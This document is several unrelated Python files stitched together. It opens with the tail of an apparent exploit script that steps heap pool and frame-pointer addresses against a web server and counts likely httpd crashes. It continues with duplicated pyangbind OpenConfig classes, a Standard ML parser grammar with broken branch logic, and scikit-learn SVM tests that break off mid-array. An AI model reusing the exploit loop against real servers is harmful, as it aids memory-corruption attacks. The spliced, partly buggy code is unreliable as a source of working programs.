print '\n0x%x (%02d of %02d) Would you like to continue (y/n)? [Y] ' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count),
if (response == ''):
response = 'y'
response = string.lower(raw_input())
if (response == 'n'):
# Your wish is my command...
#
# Bail...Premature Exit, Y'all!!!
print '\n0x%x (%02d of %02d) **** Bailing...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
not_time_to_quit = 0
# raise WhackLoopException
else:
# Keep on cruising, and don't come in here again, since
# we've already been there, done that, got the $&@*#$&! T-shirt...
print '\n0x%x (%02d of %02d) Continuing, as requested...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
we_still_think_target_is_vulnerable = 1
# Done with this one...
del(found_all_error_strings[key])
# except KeyboardInterrupt, (errno, err_string):
# print '0x%x (%02d of %02d) <--- Received: ERROR occurred (%d): %s' % (whack_frame_pointer. pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, errno, err_string)
except KeyboardInterrupt:
keyboard_interrupt_count += 1
print '0x%x (%02d of %02d) (Hang: %d) Would you like to continue (y/n)? [Y] ' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, keyboard_interrupt_count),
response = string.lower(raw_input())
if (response == ''):
response = 'y'
while ((response != 'y') and (response != 'n')):
print '\n0x%x (%02d of %02d) (Hang: %d) Would you like to continue (y/n)? [Y] ' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, keyboard_interrupt_count),
response = string.lower(raw_input())
if (response == ''):
response = 'y'
if (response == 'n'):
# Your wish is my command...Close this connection...
print '\n0x%x (%02d of %02d) ---> Closing...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
s.close()
# Bail...Premature Exit, Y'all!!!
print '0x%x (%02d of %02d) **** Bailing...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
raise WhackLoopException
print '\n0x%x (%02d of %02d) Continuing, as requested...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
except:
print '0x%x (%02d of %02d) **** ERROR situation occurred!' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
# Close this connection...
print '0x%x (%02d of %02d) ---> Closing...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
s.close()
# Bump the whack count...
whack_count += 1
print "0x%x (%02d of %02d) =============================================================================" % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
# Bump our target address(es)...
print "0x%x == %s ============================================================" % (whack_frame_pointer,whack_time)
whack_frame_pointer += address_increment
whack_pool_pointer = whack_frame_pointer - 0x14
whack_active_first_avail_pointer = whack_frame_pointer - whack_memcpy_return_address_frame_pointer_decrement
whack_active_first_avail_pointer -= whack_active_first_avail_decrement
except WhackLoopException:
# Bailing...
print "=========================================================================================="
print 'Bailing as requested by user...'
# Pass 1...count the total number of different pool pointer values thrown...
multiple_whack_pool_pointers_computed = 0
total_whack_pool_pointers_computed = 0
for whacked_pool_pointer in attempted_whack_pool_pointers.keys():
total_whack_pool_pointers_computed += attempted_whack_pool_pointers[whacked_pool_pointer]
multiple_whack_pool_pointers_computed += (attempted_whack_pool_pointers[whacked_pool_pointer] - 1)
stop_time = time.asctime(time.gmtime())
print "=========================================================================================="
print 'completed address range 0x%x-0x%x by 0x%x completed' % (start_address, end_address, address_increment)
print 'completed whack(s) thrown....................: %d' % (whack_count)
print 'completed whack(s) ungrokkable (filtered)....: %d' % (whack_ungrokkable_count)
print 'completed keyboard interrupts (hung whacks?).: %d' % (keyboard_interrupt_count)
print 'completed whack_pool_pointer values computed.: %d' % (total_whack_pool_pointers_computed)
print 'multiply computed whack_pool_pointer values...: %d' % (multiple_whack_pool_pointers_computed)
print 'completed total whack attempts...............: %d' % (whack_count + whack_ungrokkable_count)
print 'completed total bytes thrown.................: %d' % (total_bytes_thrown)
print 'completed total bytes received...............: %d' % (total_bytes_received)
print 'completed probable httpd crash count.........: %d' % (probable_crash_count)
print 'completed start time.........................: %s' % (start_time)
print 'completed stop time..........................: %s' % (stop_time)
print "=========================================================================================="
# Pass 2...list the multiples...
# Pass 2...list the multiples...print 'the dupe whack_pool_pointer values............'
# Pass 2...list the multiples...sorted_by_key = attempted_whack_pool_pointers.keys()
# Pass 2...list the multiples...sorted_by_key.sort()
# Pass 2...list the multiples...for whacked_pool_pointer in sorted_by_key:
# Pass 2...list the multiples... if (attempted_whack_pool_pointers[whacked_pool_pointer] > 1):
# Pass 2...list the multiples... print "0x%8x --> %d" % (whacked_pool_pointer, attempted_whack_pool_pointers[whacked_pool_pointer])
# Pass 2...list the multiples...print "==================================================================================================================="
| |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
class max_reservable_link_bandwidth(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-isn/neighbors/neighbor/subTLVs/subTLVs/max-reservable-link-bandwidth. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines sub-TLV 10.
"""
__slots__ = ("_path_helper", "_extmethods", "__state")
_yang_name = "max-reservable-link-bandwidth"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"mt-isn",
"neighbors",
"neighbor",
"subTLVs",
"subTLVs",
"max-reservable-link-bandwidth",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/max_reservable_link_bandwidth/state (container)
YANG Description: State parameters of sub-TLV 10.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/max_reservable_link_bandwidth/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters of sub-TLV 10.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
_pyangbind_elements = OrderedDict([("state", state)])
from . import state
class max_reservable_link_bandwidth(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-isn/neighbors/neighbor/subTLVs/subTLVs/max-reservable-link-bandwidth. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines sub-TLV 10.
"""
__slots__ = ("_path_helper", "_extmethods", "__state")
_yang_name = "max-reservable-link-bandwidth"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"mt-isn",
"neighbors",
"neighbor",
"subTLVs",
"subTLVs",
"max-reservable-link-bandwidth",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/max_reservable_link_bandwidth/state (container)
YANG Description: State parameters of sub-TLV 10.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/max_reservable_link_bandwidth/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters of sub-TLV 10.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
_pyangbind_elements = OrderedDict([("state", state)])
| |
from lexer import tokens
import ply.yacc as yacc
from ast import *
import ctypes
import colors
start = 'dec'
debug = 0
error_handle = 1
errflag = [False]
# 0 Do Nothing; 1 discard the token; 2 discard the whole exp; 3 re-sim
# error_handle = str(sys.argv)
def p_error(p):
if p:
print(colors.error("Syntax error near '%s' at line %d, %d" % (p.value, p.lineno, p.lexpos)))
else:
print(colors.error("Syntax error at EOF"))
if error_handle == 1:
print("Trying to discard the token '%s'" % p.value)
yacc.errok()
elif error_handle == 2:
print("Trying to discard the whole sentence which includes '%s'" % p.value)
while 1:
tok = yacc.token() # Get the next token
if not tok or tok.type == ';':
break
yacc.restart()
elif error_handle == 3:
print(colors.error("It won't be fixed in p_error"))
pass
else:
print(colors.error("Nothing would take place to fix the error"))
errflag[0] = True
def p_program(p):
"""program : program ';' exp
| program ';' dec
| exp
| dec
"""
if debug: print(' PROGRAM')
if len(p) == 2:
p[0] = [p[1]]
else:
p[0] = p[1] + [p[3]]
def p_cons_int(p):
# noinspection PySingleQuotedDocstring
"""cons : INT_VAL"""
if debug: print("int : ", p[1])
p[0] = Value(value=p[1], tycon=int_type)
def p_cons_real(p):
"""cons : REAL_VAL"""
if debug: print("real : ", p[1])
p[0] = Value(value=ctypes.c_float(p[1]).value, tycon=real_type)
def p_cons_str(p):
'cons : STRING_VAL'
if debug: print("string : ", p[1])
p[0] = Value(value=p[1], tycon=string_type)
def p_cons_char(p):
'cons : CHAR_VAL'
if debug: print('char : ', p[1])
p[0] = Value(value=p[1], tycon=char_type)
def p_vid(p):
""" vid : symbol
| ALPHANUMERIC
"""
if debug: print(" VID : ", p[1])
p[0] = p[1]
def p_tycon(p):
''' tycon : vid
'''
if debug: print(" TYCON : ", p[1])
p[0] = p[1]
def p_tyvar(p):
''' tyvar : "'" vid
'''
p[0] = "'" + p[2]
if debug: print(" TYVAR : ", p[0])
def p_lab(p):
''' lab : vid
| INT_VAL
'''
try:
p[0] = int(p[1])
except ValueError:
p[0] = p[1]
if debug: print(" LAB : ", p[0])
# (*---------------------------------------------------------------*)
# (* Pattern *)
# (*---------------------------------------------------------------*)
# atomic pattern
def p_atpat_wc(p):
"""atpat : '_'
| cons """
if p[1] == '_':
p[0] = Pattern(Value(wildcard=True))
else:
p[0] = Pattern(p[1])
def p_atpat_id(p):
"""atpat : vid
| OP vid"""
if len(p) == 2:
p[0] = Pattern(Value(id=p[1]))
else:
p[0] = Pattern(Value(id=p[2], op=True))
def p_atpat_r(p):
"""atpat : '{' '}'
| '{' patrow '}' """
if len(p) == 3:
p[0] = Pattern(Unit())
else:
p[0] = Pattern(p[2])
def p_atpat(p):
" atpat : '(' pat ')' "
p[0] = p[2]
def p_patrow_seq(p):
''' patrow_seq : lab '=' pat
| lab '=' pat ',' patrow
'''
if len(p) == 4:
p[0] = [RecordItem(lab=p[1], value=p[3])]
else:
p[0] = [RecordItem(lab=p[1], value=p[3])] + p[5]
def p_patrow(p):
''' patrow : SUSPENSION
| patrow_seq
'''
if p[1] == "...":
p[0] = [RecordItem(None, None)]
else:
p[0] = p[1]
def p_pat(p):
''' pat : atpat
| OP vid atpat
| vid atpat
| pat vid pat
| pat ':' ty
'''
if debug: print(" PAT ")
if len(p) == 2: # atpat
p[0] = p[1]
elif p[1] == "op": # op vid atpat
p[0] = Pattern(Value(vcon=p[2], value=p[3].value, op=True))
elif len(p) == 3: # vid atpat
p[0] = Pattern((p[1], p[2])) # or p[2].value with vcon = p[1]?
elif p[2] == ':': # pat : ty
if isinstance(p[1].value, list):
p[0] = Pattern(p[1].value, p[3])
else:
p[1].value.tycon = p[3]
p[1].value.update()
p[0] = Pattern(p[1].value)
else: # pat vid pat TODO
p[0] = Pattern(Value(
value=Value(
value=[RecordItem(1, p[1].value), RecordItem(2, p[3].value)],
tycon=TyCon(name="record")),
vcon=p[2]))
# (*---------------------------------------------------------------*)
# (* type *)
# (*---------------------------------------------------------------*)
def p_ty(p):
''' ty : aty
| ty POINT_TO ty
'''
if len(p) == 2:
p[0] = p[1]
else:
p[0] = TyCon([], "fn", 0, (p[1], p[3]))
def p_aty_con(p):
''' aty : tycon
| aty tycon
| '(' tyseq_l ')' tycon
'''
if len(p) == 2:
if p[1] in primative_tycon:
p[0] = primative_tycon[p[1]]
else:
p[0] = TyCon(tyvar=[], name=p[1])
elif len(p) == 3:
p[0] = TyCon([p[1]], p[2], 1)
else:
p[0] = TyCon(p[2], p[4], len(p[2]))
def p_aty(p):
''' aty : tyvar
| '(' ty ')'
| '{' '}'
| '{' tyrow '}'
'''
if debug: print(" TY ")
if len(p) == 2:
p[0] = p[1]
elif p[1] == '(':
p[0] = p[2]
elif p[1] == '{':
if len(p) == 3:
p[0] = unit_type
else:
p[0] = p[2]
def p_tyrow(p):
''' tyrow : lab ':' ty
| lab ':' ty ',' tyrow
'''
if debug: print(" TYROW : ", len(p))
if len(p) == 4:
p[0] = TyCon(type={p[1]: p[3]}, name='record')
else:
p[0] = p[5]
p[0].type[p[1]] = p[3]
def p_tyseq_l(p):
''' tyseq_l : ty ',' ty
| ty ',' tyseq_l
'''
if debug: print(" TYSEQ_LIST ")
p[0] = [p[1]] + (p[3] if type(p[3]) == list else [p[3]])
# (*---------------------------------------------------------------*)
# (* expression *)
# (*---------------------------------------------------------------*)
def p_atexp_c(p):
' atexp : cons '
p[0] = Expression("Constant", p[1])
def p_atexp_r(p):
''' atexp : '{' '}'
| '{' exprow '}' '''
if len(p) == 3:
p[0] = Expression("Constant", Value(tycon=unit_type))
else:
p[0] = Expression("Record", p[2])
def p_atexp(p):
''' atexp : vid
| OP vid
| LET decs IN exp END
| LET decs IN exps END
| '(' exp ')'
| '(' exps ')'
'''
if len(p) == 2:
p[0] = Expression("App", Value(id=p[1]))
elif len(p) == 3:
p[0] = Expression("App", Value(id=p[2], op=True))
elif len(p) == 6:
p[0] = Expression("Let", (p[2], p[4]))
else:
p[0] = p[2]
def p_atexp_error1(p):
''' atexp : LET decs error IN exp END
| LET decs error IN exps END
'''
if error_handle == 3:
print("p_atexp_error1!")
p[0] = Expression("Let", (p[2], p[4]))
def p_atexp_error2(p):
''' atexp : LET decs IN error exp END
| LET decs IN error exps END
'''
if error_handle == 3:
print("p_atexp_error2!")
p[0] = Expression("Let", (p[2], p[5]))
def p_atexp_error3(p):
''' atexp : LET error decs IN exp END
| LET error decs IN exps END
'''
if error_handle == 3:
print("p_atexp_error2!")
p[0] = Expression("Let", (p[3], p[5]))
def p_exprow(p):
''' exprow : lab '=' exp
| lab '=' exp ',' exprow
'''
if debug: print(" EXPROW ")
if len(p) == 4:
p[0] = [RecordItem(p[1], p[3])]
else:
p[0] = [RecordItem(p[1], p[3])] + p[5]
def p_exps(p):
''' exps : exp ';' exp
'''
p[0] = Expression("EXPS", [p[1], p[3]])
def p_exps_(p):
''' exps : exp ';' exps
'''
p[0] = Expression("EXPS", [p[1]] + p[3].reg)
def p_exp(p):
''' exp : app_exp
| '(' exps ')'
| exp ':' ty
| exp ANDALSO exp
| exp ORELSE exp
| CASE exp OF match
| IF exp THEN exp ELSE exp
| FN match
'''
if debug:
print(" EXP ")
elif len(p) == 2:
if len(p[1]) == 1:
p[0] = p[1][0]
else:
p[0] = Expression("App", p[1])
elif len(p) == 3:
p[0] = Expression("Fn", p[2])
elif p[2] == ':':
p[0] = Expression("Constraint", (p[1], p[3]))
elif p[2] == "andalso":
p[0] = Expression("Andalso", (p[1], p[3]))
elif p[2] == "orelse":
p[0] = Expression("Orelse", (p[1], p[3]))
elif len(p) == 5:
p[0] = Expression("Case", (p[2], p[4]))
elif len(p) == 5:
p[0] = Expression("If", (p[2], p[4], p[6]))
def p_app_exp(p):
''' app_exp : atexp app_exp1
'''
# | vid app_exp1
p[0] = [p[1]] + p[2]
def p_app_exp1(p):
''' app_exp1 : empty
| app_exp
'''
p[0] = p[1]
# (*---------------------------------------------------------------*)
# (* declaration *)
# (*---------------------------------------------------------------*)
def p_match(p):
''' match : mrule
| mrule '|' match
'''
if debug: print(" MATCH ")
if len(p) == 2:
p[0] = [p[1]]
else:
p[0] = [p[1]] + p[3]
def p_mrule(p):
''' mrule : pat LEAD_TO exp
'''
if debug: print(" MRULE ")
p[0] = (p[1], p[3])
def p_decs(p):
''' decs : empty
| dec decs
| dec ';' decs
'''
if debug: print(" DECS ")
if len(p) == 2:
p[0] = []
elif len(p) == 3:
p[0] = [p[1]] + p[2]
else:
p[0] = [p[1]] + p[3]
def p_dec(p):
''' dec : VAL valbind
| TYPE typbind
| DATATYPE datbind
'''
if debug: print(" DEC ", p[1])
if p[1] == "val":
p[0] = Declaration(p[1], p[2])
elif p[1] == "type":
p[0] = Declaration(p[1], p[2])
else:
p[0] = Declaration(p[1], p[2])
def p_valbind(p):
''' valbind : pat '=' exp
| REC fvalbind
'''
if debug: print(" VALBIND ")
if len(p) == 3:
p[0] = p[2]
p[0].rec = True
elif len(p) == 4:
p[0] = valbind(p[1], p[3])
def p_fvalbind(p):
''' fvalbind : pat '=' FN match
'''
p[0] = valbind(p[1], Expression("Fn", p[4]))
def p_typbind(p):
''' typbind : tyvarseq tycon '=' ty
| tycon '=' ty
'''
if debug: print(" TYPBIND ")
if len(p) == 4:
p[0] = typbind([], p[1], p[3])
elif len(p) == 5:
p[0] = typbind(p[1], p[2], p[4])
def p_datbind(p):
''' datbind : tyvarseq tycon '=' conbind
| tycon '=' conbind
'''
if debug: print(" DATBIND ")
if len(p) == 4:
p[0] = datbind([], p[1], p[3])
elif len(p) == 5:
p[0] = datbind(p[1], p[2], p[4])
def p_conbind(p):
''' conbind : vid connext
| vid OF ty connext
'''
if debug: print(" CONBIND ")
if len(p) == 3:
p[0] = [(Value(id=p[1], op=False), unit_type)] + p[2]
else:
p[0] = [(Value(id=p[1], op=False), p[3])] + p[4]
def p_conbind_op(p):
''' conbind : OP vid connext
| OP vid OF ty connext
'''
if debug: print(" CONBIND ")
if len(p) == 4:
p[0] = [(Value(id=p[1], op=True), unit_type)] + p[2]
else:
p[0] = [(Value(id=p[1], op=True), p[3])] + p[4]
def p_connext(p):
''' connext : empty
| '|' conbind
'''
if debug: print(" CONNEXT ")
if len(p) == 2:
p[0] = p[1]
else:
p[0] = p[2]
# (*---------------------------------------------------------------*)
# (* type *)
# (*---------------------------------------------------------------*)
def p_tyvarseq(p):
''' tyvarseq : tyvar
| '(' tyvarseq_l ')'
'''
if debug: print(" TYVARSEQ ", len(p))
if len(p) == 2:
p[0] = [p[1]]
else:
p[0] = p[2]
def p_tyvarseq_l(p):
''' tyvarseq_l : tyvar
| tyvar ',' tyvarseq_l
'''
if debug: print(" TYVARSEQ_L ")
if len(p) == 2:
p[0] = [p[1]]
else:
p[0] = [p[1]] + p[3]
def p_empty(p):
'empty : '
if debug: print(" EMPTY ")
p[0] = []
def p_symbol(p):
'''symbol : SYMBOLIC
| '+'
| '-'
| '*'
| '/'
| '^'
| '#'
'''
p[0] = p[1]
if debug: print(' symbol ')
parser = yacc.yacc(debug=True) if debug else yacc.yacc(debug=False, errorlog=yacc.NullLogger())
| |
import warnings
import numpy as np
from scipy import sparse
from sklearn import datasets, svm, linear_model, base
from numpy.testing import assert_array_almost_equal, \
assert_array_equal, assert_equal
from nose.tools import assert_raises, assert_true
from nose.tools import assert_equal as nose_assert_equal
from sklearn.datasets.samples_generator import make_classification
from sklearn.svm.tests import test_svm
from sklearn.utils import ConvergenceWarning
from sklearn.utils.extmath import safe_sparse_dot
# test sample 1
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
X_sp = sparse.lil_matrix(X)
Y = [1, 1, 1, 2, 2, 2]
T = np.array([[-1, -1], [2, 2], [3, 2]])
true_result = [1, 2, 2]
# test sample 2
X2 = np.array([[0, 0, 0], [1, 1, 1], [2, 0, 0, ],
[0, 0, 2], [3, 3, 3]])
X2_sp = sparse.dok_matrix(X2)
Y2 = [1, 2, 2, 2, 3]
T2 = np.array([[-1, -1, -1], [1, 1, 1], [2, 2, 2]])
true_result2 = [1, 2, 3]
iris = datasets.load_iris()
# permute
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# sparsify
iris.data = sparse.csr_matrix(iris.data)
def test_svc():
"""Check that sparse SVC gives the same result as SVC"""
clf = svm.SVC(kernel='linear', probability=True).fit(X, Y)
sp_clf = svm.SVC(kernel='linear', probability=True).fit(X_sp, Y)
assert_array_equal(sp_clf.predict(T), true_result)
assert_true(sparse.issparse(sp_clf.support_vectors_))
assert_array_almost_equal(clf.support_vectors_,
sp_clf.support_vectors_.todense())
assert_true(sparse.issparse(sp_clf.dual_coef_))
assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.todense())
assert_true(sparse.issparse(sp_clf.coef_))
assert_array_almost_equal(clf.coef_, sp_clf.coef_.todense())
assert_array_almost_equal(clf.predict(T), sp_clf.predict(T))
# refit with a different dataset
clf.fit(X2, Y2)
sp_clf.fit(X2_sp, Y2)
assert_array_almost_equal(clf.support_vectors_,
sp_clf.support_vectors_.todense())
assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.todense())
assert_array_almost_equal(clf.coef_, sp_clf.coef_.todense())
assert_array_almost_equal(clf.predict(T2), sp_clf.predict(T2))
assert_array_almost_equal(clf.predict_proba(T2), sp_clf.predict_proba(T2), 4)
def test_svc_with_custom_kernel():
kfunc = lambda x, y: safe_sparse_dot(x, y.T)
clf_lin = svm.SVC(kernel='linear').fit(X_sp, Y)
clf_mylin = svm.SVC(kernel=kfunc).fit(X_sp, Y)
assert_array_equal(clf_lin.predict(X_sp), clf_mylin.predict(X_sp))
def test_svc_iris():
"""Test the sparse SVC with the iris dataset"""
for k in ('linear', 'poly', 'rbf'):
sp_clf = svm.SVC(kernel=k).fit(iris.data, iris.target)
clf = svm.SVC(kernel=k).fit(iris.data.todense(), iris.target)
assert_array_almost_equal(clf.support_vectors_,
sp_clf.support_vectors_.todense())
assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.todense())
assert_array_almost_equal(
clf.predict(iris.data.todense()), sp_clf.predict(iris.data))
if k == 'linear':
assert_array_almost_equal(clf.coef_, sp_clf.coef_.todense())
def test_error():
"""
Test that it gives proper exception on deficient input
"""
# impossible value of C
assert_raises(ValueError, svm.SVC(C=-1).fit, X, Y)
# impossible value of nu
clf = svm.NuSVC(nu=0.0)
assert_raises(ValueError, clf.fit, X_sp, Y)
Y2 = Y[:-1] # wrong dimensions for labels
assert_raises(ValueError, clf.fit, X_sp, Y2)
clf = svm.SVC()
clf.fit(X_sp, Y)
assert_array_equal(clf.predict(T), true_result)
def test_linearsvc():
"""
Similar to test_SVC
"""
clf = svm.LinearSVC().fit(X, Y)
sp_clf = svm.LinearSVC().fit(X_sp, Y)
assert_true(sp_clf.fit_intercept)
assert_array_almost_equal(clf.raw_coef_, sp_clf.raw_coef_, decimal=4)
assert_array_almost_equal(clf.predict(X), sp_clf.predict(X_sp))
clf.fit(X2, Y2)
sp_clf.fit(X2_sp, Y2)
assert_array_almost_equal(clf.raw_coef_, sp_clf.raw_coef_, decimal=4)
def test_linearsvc_iris():
"""Test the sparse LinearSVC with the iris dataset"""
sp_clf = svm.LinearSVC().fit(iris.data, iris.target)
clf = svm.LinearSVC().fit(iris.data.todense(), iris.target)
assert_equal(clf.fit_intercept, sp_clf.fit_intercept)
assert_array_almost_equal(clf.raw_coef_, sp_clf.raw_coef_, decimal=1)
assert_array_almost_equal(
clf.predict(iris.data.todense()), sp_clf.predict(iris.data))
# check decision_function
pred = np.argmax(sp_clf.decision_function(iris.data), 1)
assert_array_almost_equal(pred, clf.predict(iris.data.todense()))
def test_weight():
"""
Test class weights
"""
X_, y_ = make_classification(n_samples=200, n_features=100,
weights=[0.833, 0.167], random_state=0)
X_ = sparse.csr_matrix(X_)
for clf in (linear_model.LogisticRegression(),
svm.LinearSVC(),
svm.SVC()):
clf.set_params(class_weight={0: 5})
clf.fit(X_[:180], y_[:180])
y_pred = clf.predict(X_[180:])
assert_true(np.sum(y_pred == y_[180:]) >= 11)
def test_sample_weights():
"""
Test weights on individual samples
"""
clf = svm.SVC()
clf.fit(X_sp, Y)
assert_array_equal(clf.predict(X[2]), [1.])
sample_weight = [.1] * 3 + [10] * 3
clf.fit(X_sp, Y, sample_weight=sample_weight)
assert_array_equal(clf.predict(X[2]), [2.])
def test_sparse_liblinear_intercept_handling():
"""
Test that sparse liblinear honours intercept_scaling param
"""
test_svm.test_dense_liblinear_intercept_handling(svm.LinearSVC)
def test_sparse_realdata():
"""
Test on a subset from the 20newsgroups dataset.
This catchs some bugs if input is not correctly converted into
sparse format or weights are not correctly initialized.
"""
data = np.array([0.03771744, 0.1003567, 0.01174647, 0.027069])
indices = np.array([6, 5, 35, 31])
indptr = np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2,
